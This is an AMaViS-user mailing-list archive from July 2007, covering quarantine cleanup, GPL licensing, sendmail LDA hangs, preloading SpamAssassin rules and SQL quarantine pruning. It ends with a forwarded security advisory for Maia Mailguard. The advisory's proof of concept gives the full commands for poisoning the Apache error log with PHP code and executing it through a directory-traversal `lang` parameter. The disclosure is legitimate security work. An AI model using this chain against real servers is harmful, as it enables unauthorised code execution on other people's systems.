[AMaViS-user] clearing quarantined messages
Hello, I'm a newby on amavis. I run amavis to block virus-email. It seems to work fine: no virusses came through so far, and no email got lost (I think). The problem is that my quarantine directory is filling up, and I don't know how to clean it. When I cleared /var/lib/amavis/tmp/, amavis stopped working. How do I safely remove old quarantine files (e.g. 30 days)? I run amavisd-new 2.4.2-6.1 on Debian Etch. Thanks - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] clearing quarantined messages
vwf wrote: Hello, I'm a newby on amavis. I run amavis to block virus-email. It seems to work fine: no virusses came through so far, and no email got lost (I think). The problem is that my quarantine directory is filling up, and I don't know how to clean it. When I cleared /var/lib/amavis/tmp/, amavis stopped working. How do I safely remove old quarantine files (e.g. 30 days)? I run amavisd-new 2.4.2-6.1 on Debian Etch. Thanks It is safe to remove the old temporary and quarantine files - amavis will not be using them. find /var/lib/amavis/tmp/ -type f -mtime +30 -print | xargs /bin/rm -f MrC - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] Announce: Amavis log reporter updated v1.48.8
Hello Amavis users, I've made enough changes in the Amavis log reporting utility to probably warrant this more general list announcement. The updates since my May 6th announcement are: New Features: - Ability to limit each detailed section's level 1 output (i.e. Top N). Variables that control depth levels in detailed reports may now be specified as m.n, where m is the maximum level to output, and n specifies the number of level 1 items output. For example, the setting: $amavis_SpamBlocked = 2.10 will output the top 10 level 1 items, with each of those items providing 2 sub-levels of detail. - Show SA test scores in spam/ham reports - Add additional ccats MTA-BLOCKED, OVERSIZED, OTHER - Added content-type section (log_level = 2) - Added SpamAssassin bypassed count summary ($sa_mail_body_size_limit) - Rework white/blacklisted section; sender is now tracked. Thanks Mike, I'll try it next week :) Regards, Leon - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
[AMaViS-user] Amavisd License Clarification
I was looking at the recent amavisd-new presentation by the author and slide four says that amavisd-new is GPL. If it is GPL that would bring many many installations out of license compliance, especially in commercial products and email filtering services, that have heavily customized amavisd-new without submitting their changes to the community. I thought that it had a BSD license which allows unlimited changes without change submissions, rather than GPL which requires that changes be submitted back to the community and forbids use in commercial products that don't supply all source code. Mike Katz http://messagepartners.com - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] Amavisd License Clarification
On 7/5/07, Michael Katz [EMAIL PROTECTED] wrote: I was looking at the recent amavisd-new presentation by the author and slide four says that amavisd-new is GPL. If it is GPL that would bring many many installations out of license compliance, especially in commercial products and email filtering services, that have heavily customized amavisd-new without submitting their changes to the community. I thought that it had a BSD license which allows unlimited changes without change submissions, rather than GPL which requires that changes be submitted back to the community and forbids use in commercial products that don't supply all source code. I don't have anything older than 2.2.1 to hand, but it certainly uses the GPL as far back as that - as clearly detailed in the file titled LICENSE :) -- Please keep list traffic on the list. Rob MacGregor Whoever fights monsters should see to it that in the process he doesn't become a monster. Friedrich Nietzsche - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] Amavisd License Clarification
Rob MacGregor wrote: On 7/5/07, Michael Katz [EMAIL PROTECTED] wrote: I was looking at the recent amavisd-new presentation by the author and slide four says that amavisd-new is GPL. If it is GPL that would bring many many installations out of license compliance, especially in commercial products and email filtering services, that have heavily customized amavisd-new without submitting their changes to the community. I thought that it had a BSD license which allows unlimited changes without change submissions, rather than GPL which requires that changes be submitted back to the community and forbids use in commercial products that don't supply all source code. I don't have anything older than 2.2.1 to hand, but it certainly uses the GPL as far back as that - as clearly detailed in the file titled LICENSE :) I guess it doesn't matter because who would enforce the license anyway? - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
[AMaViS-user] old-style sendmail LDA method hangs
Hello, I'm trying to migrate from a prehistorical non-daemon amavis to current amavisd-new. I have problems trying to use it with the sendmail LDA helper utility shipped with amavisd. I have the following mailer definition: Mlocal,P=/usr/sbin/amavis, F=lsDFMAw5:/|@qSPhn9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, T=DNS/RFC822/X-Unix, U=root:amavisd, A=amavis $f $u -- /usr/bin/procmail -t -Y -a $h -d $u Everything starts OK, but it hangs until timeout or until the helper program (amavis) is manually killed. --- Net::Server: 2007/07/05-12:56:00 CONNECT UNIX Socket: /var/amavisd/amavisd.sock loaded base policy bank loaded policy bank AM.PDP-SOCK process_request: fileno sock=11, STDIN=0, STDOUT=1 switch_to_my_time 480 s, new request process_request: suggested_protocol=AM.PDP on UNIX process_policy_request: 0, amavisd (ch1-P-idle), fileno=11 switch_to_client_time 480 s, start receiving AM.PDP data --- and it stalls here. After killing the helper program: --- switch_to_my_time 480 s, received AM.PDP line (!)policy protocol: INVALID AM.PDP ATTRIBUTE LINE: /var/amavisd/amavis-client-XXQ1CLnF switch_to_client_time 480 s, receiving AM.PDP data switch_to_my_time 480 s, end of AM.PDP session exiting process_request post_process_request_hook: timer was not running idle_proc, bye: was busy, 52872.0 ms, total idle 0.000 s, busy 52.872 s load: 100 %, total idle 0.000 s, busy 52.872 s --- v5.8.0, amavisd 20070627. The problem probably does not have anything to do with sendmail, since it fails even if I try to feed the helper program manually, i.e.: cat mail | amavis [EMAIL PROTECTED] wxmj040p -- /usr/bin/procmail -t -Y -a -d wxmj040p Any idea what may be wrong? -- Michał Jęczalik, +48.603.64.62.97 INFONAUTIC, +48.33.487.69.04 - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
[AMaViS-user] Pre-Loading additional modules
In my amavisd.conf file I have: @additional_perl_modules = qw(/var/lib/spamassassin/compiled/3.002001/Mail/SpamAssassin/CompiledRegexps/body_0.pm /etc/mail/spamassassin/Botnet.pm /etc/mail/spamassassin/PDFinfo.pm); But CompiledRegexps/body_0.pm doesn't seem to load: Jul 5 08:09:14 sa amavis[28179]: (28179-01) extra modules loaded: Mail/SpamAssassin/CompiledRegexps/body_0.pm Jul 5 08:09:20 sa amavis[27837]: (27837-04) extra modules loaded: unicore/lib/gc_sc/Digit.pl, unicore/lib/gc_sc/SpacePer.pl Am I using the @additional_perl_modules statement properly? Amavisd-new version 2.5.2 on Mandriva Corporate Server 4.0 -- Daniel J McDonald, CCIE # 2495, CISSP # 78281, CNX Austin Energy http://www.austinenergy.com - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] Always - BAD HEADER, Missing required header field: Date
Stefan.G wrote: On Wed, Jul 04, 2007 at 05:27:47PM +0200, mouss wrote: Stefan.G wrote: Sometimes i get not the Date BAD HEADER Error X-Amavis-Alert: BAD HEADER, Non-encoded 8-bit data (char E2 hex): X-eBay-due:\n\t\\342\\25431,76\\n Some webmail and bulkware clients are broken and send 8bit headers without encoding them. There's nothing you can do about it, except disabling the check or living with it. As far as you don't block/quarantine because of bad header, you can live with the warnings. Ok . Can i get Problems witht spamass. when i disable the bad header check - quarantine mode ? no. I have the bad headers check enabled, but no quarantine mode (I don't quarantine anything but viruses. spam gets delivered to special folders. bad headers do not change the disposition, because I see many of them in ham). - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] clearing quarantined messages
MrC wrote: vwf wrote: Hello, I'm a newby on amavis. I run amavis to block virus-email. It seems to work fine: no virusses came through so far, and no email got lost (I think). The problem is that my quarantine directory is filling up, and I don't know how to clean it. When I cleared /var/lib/amavis/tmp/, amavis stopped working. How do I safely remove old quarantine files (e.g. 30 days)? I run amavisd-new 2.4.2-6.1 on Debian Etch. Thanks It is safe to remove the old temporary and quarantine files - amavis will not be using them. find /var/lib/amavis/tmp/ -type f -mtime +30 -print | xargs /bin/rm -f MrC On Debian you can remove temporary amavis-* directories simply by restarting amavis with '/etc/init.d/amavis restart'. The init script has code to remove temp directories (this is performed after amavisd-new is stopped): cleanup() { [ -d /var/lib/amavis ] find /var/lib/amavis -maxdepth 1 -name 'amavis-*' -type d \ -exec rm -rf {} \; /dev/null 21 || true [ -d /var/lib/amavis/tmp ] find /var/lib/amavis/tmp -maxdepth 1 -name 'amavis-*' -type d \ -exec rm -rf {} \; /dev/null 21 || true : } You should only have one amavis-* temp directory for each running amavisd-new process. If there are many more than this, you likely have some sort of problem. See http://www.ijs.si/software/amavisd/#faq-gen As MrC shows, you can use the find command to delete files older than a given number of days. The command I use is similar: find /var/lib/amavis/virusmails -name 'virus-*' -mtime +29 -type f -exec rm -f {} \; Gary V - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] Pre-Loading additional modules
Daniel wrote: In my amavisd.conf file I have: @additional_perl_modules = qw(/var/lib/spamassassin/compiled/3.002001/Mail/SpamAssassin/CompiledRegexps/body_0.pm /etc/mail/spamassassin/Botnet.pm /etc/mail/spamassassin/PDFinfo.pm); But CompiledRegexps/body_0.pm doesn't seem to load: Jul 5 08:09:14 sa amavis[28179]: (28179-01) extra modules loaded: Mail/SpamAssassin/CompiledRegexps/body_0.pm Jul 5 08:09:20 sa amavis[27837]: (27837-04) extra modules loaded: unicore/lib/gc_sc/Digit.pl, unicore/lib/gc_sc/SpacePer.pl Am I using the @additional_perl_modules statement properly? Amavisd-new version 2.5.2 on Mandriva Corporate Server 4.0 In RELEASE_NOTES for 2.5.2: - suggestion: when using SpamAssassin plugin Rule2XSBody (available in more recent versions of SA), adding an entry like: Mail::SpamAssassin::CompiledRegexps::body_0 to the @additional_perl_modules list allows preloading of compiled rules. Adding the following two lines to amavisd.conf adds the directory name containing modules with compiled rules to Perl modules search path and allows Perl to find the listed module(s): my($sa_instdir) = '/var/db/spamassassin/compiled/3.002001'; unshift(@INC, $sa_instdir, $sa_instdir.'/auto'); Gary V - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] Amavisd License Clarification
On 05/07/07, Michael Katz [EMAIL PROTECTED] wrote: I was looking at the recent amavisd-new presentation by the author and slide four says that amavisd-new is GPL. If it is GPL that would bring many many installations out of license compliance, especially in commercial products and email filtering services, that have heavily customized amavisd-new without submitting their changes to the community. I thought that it had a BSD license which allows unlimited changes without change submissions, rather than GPL which requires that changes be submitted back to the community and forbids use in commercial products that don't supply all source code. Mike Katz http://messagepartners.com Mike, IANAL, but I don't think that's what the GPL means. I think it means that IF a company distributes a product containing modified GPL components, they are required to provide the source to those modified components upon request (and publicly state their willingness to do so), and only by not doing either would be violating the GPL. It does not mean that you've got to submit all your modifications back to the community, because (a) the poor community would be swamped with diffs by people who modify not for any other purpose but to get amavisd-new to fit a mold they can't otherwise change. (b) this FAQ says so: http://www.gnu.org/licenses/gpl-faq.html#GPLRequireSourcePostedPublic So, if I'm reading this right, only a company selling an email filtering appliance containing a modified copy of amavisd-new need worry. regards, Riaan - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] SQL quarantine: delete or modify?
Brian Wong wrote: If you just delete records from the 'quarantine' table there would be no problem. Because the reference is to the 'msgs' table, not the other way around. if you then 'clean out logs' (ie, delete records from msgs table every 90 days) won't it be missing a key and mess up foreign key constraints? _ This email has been scanned and certified safe by SpammerTrap(tm). For Information please see http://www.spammertrap.com _ - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] SQL quarantine: delete or modify?
On 7/5/07, Michael Scheidell [EMAIL PROTECTED] wrote: In SQL based quarantine, if I run a script to delete quarantined email after (x) days, but want to keep the LOG entries, what is best to do? Just find quarantined chunks and set to ''? Or point id to a phony (blank) record? The former would keep lots of records that are duplicates (blank chunks) but the later might mess up foreign keys. What are you doing? If you just delete records from the 'quarantine' table there would be no problem. Because the reference is to the 'msgs' table, not the other way around. - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
[AMaViS-user] SQL quarantine: delete or modify?
In SQL based quarantine, if I run a script to delete quarantined email after (x) days, but want to keep the LOG entries, what is best to do? Just find quarantined chunks and set to ''? Or point id to a phony (blank) record? The former would keep lots of records that are duplicates (blank chunks) but the later might mess up foreign keys. What are you doing? -- Michael Scheidell, CTO SECNAP Network Security Corporation _ This email has been scanned and certified safe by SpammerTrap(tm). For Information please see http://www.spammertrap.com _ - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] SQL quarantine: delete or modify?
Brian Wong wrote: On 7/5/07, Michael Scheidell [EMAIL PROTECTED] wrote: Brian Wong wrote: If you just delete records from the 'quarantine' table there would be no problem. Because the reference is to the 'msgs' table, not the other way around. if you then 'clean out logs' (ie, delete records from msgs table every 90 days) won't it be missing a key and mess up foreign key constraints? ok, thanks. I think you are misunderstanding how it works. The dependence is unidirectional. If you delete the record from a 'msgs' table, the corresponding record in the 'quarantine' table will be removed. If you delete just the record in the 'quarantine' table, that will be the only table affected. The process of deleting a record from the 'msgs' table will check for any references to it. It will delete those that are referenced to it, but the lack of the reference will not throw an error. _ This email has been scanned and certified safe by SpammerTrap(tm). For Information please see http://www.spammertrap.com _ - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] SQL quarantine: delete or modify?
On 7/5/07, Michael Scheidell [EMAIL PROTECTED] wrote: Brian Wong wrote: If you just delete records from the 'quarantine' table there would be no problem. Because the reference is to the 'msgs' table, not the other way around. if you then 'clean out logs' (ie, delete records from msgs table every 90 days) won't it be missing a key and mess up foreign key constraints? I think you are misunderstanding how it works. The dependence is unidirectional. If you delete the record from a 'msgs' table, the corresponding record in the 'quarantine' table will be removed. If you delete just the record in the 'quarantine' table, that will be the only table affected. The process of deleting a record from the 'msgs' table will check for any references to it. It will delete those that are referenced to it, but the lack of the reference will not throw an error. - This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ ___ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
[AMaViS-user] FW: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary Code Execution][NETRAGARD-20070628]
didn't see this anywhere, thought you might want to know: -- Michael Scheidell, CTO SECNAP Network Security Corporation Keep up to date with latest information on IT security: Real time security alerts: http://www.secnap.com/news -Original Message- From: Netragard Security Advisories [mailto:[EMAIL PROTECTED] Sent: Thursday, July 05, 2007 11:19 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary Code Execution][NETRAGARD-20070628] -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 *** NETRAGARD ADVISORY http://www.netragard.com We make IT Safe [Advisory Summary] - --- Advisory Author : Adriel T. Desautels Advisory ID : NETRAGARD-20070628 Product Name: Maia Mailguard Product Version : = 1.0.2 FreeBSD and Possibly More Vendor Name : http://www.miamailguard.com Type of Vulnerability : Directory Traversal / File Read Effort (1-10 where 1 == easy) : 2 Impact : Arbitrary Code Execution Vendor Notified : Yes Patch Released : N/A Discovery Date : 06/10/2007 [POSTING NOTICE] - --- If you intend to post this advisory on your web-site you must provide a clickable link back to http://www.netragard.com as the contents of this advisory may be updated without notice. [Product Description] - --- Maia Mailguard is a web-based interface and management system based on the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl and PHP, Maia Mailguard gives end-users control over how their mail is processed by virus scanners and spam filters, while giving mail administrators the power to configure site-wide defaults and limits. - -- http://www.miamailguard.com -- [Technical Summary] - --- A Directory Traversal vulnerability exists in the Maia Mailguard Web Application that enables an attacker to execute arbitrary commands on the affected system. [Technical Details] - --- Improper input validation on the lang variable in Maia Mailguard web application has resulted in a Directory Traversal vulnerability that can be used to execute arbitrary commands on he affected system, or, to read arbitrary files on the affected system. [Proof Of Concept] - --- 1-) An attacker can inject code into the httpd-error.log file by connecting to port 80 on the affected system and issuing a get CODE HERE command. See example below: the-wretched:~ simon$ telnet maiatest.snosoft.com 80 Trying 10.0.0.128... Connected to maiatest.snosoft.com. Escape character is '^]'. get ltpre?php system('ls -laf /var/log');? HTTP/1.1 400 Bad Request Date: Wed, 20 Jun 2007 21:31:58 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 Connection: close Content-Type: text/html; charset=iso-8859-1 2-) Once the attacker has injected his code into the log file, the code can be executed by forcing the web application to read the log file. When the log file is read, the code is executed. Below is an example of code execution: the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/login.php?lang= ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt [Vendor Status] - --- Vendor has been notified and was quick to resolve the issue. [Vendor Comments] - --- The only addition that I had was that it seems to only affect systems like freebsd... It would be nice to nail that down. It suspect the root security issue is really with the php and file-system interaction... my patch just simply works around and blocks the root problem. From my developer point of view, I'm asking for one file and the file-system is giving us something else. That's a serious risk. If we could at least express that concern, I think that would be prudent. Chicken and egg problem, I was kinda waiting on you to post our own ticket, but I can add a comment afterwards. OK. Here's our ticket which also references the changeset: http://www.maiamailguard.org/maia/ticket/479 A unified patch may be retrieved from: http://www.maiamailguard.org/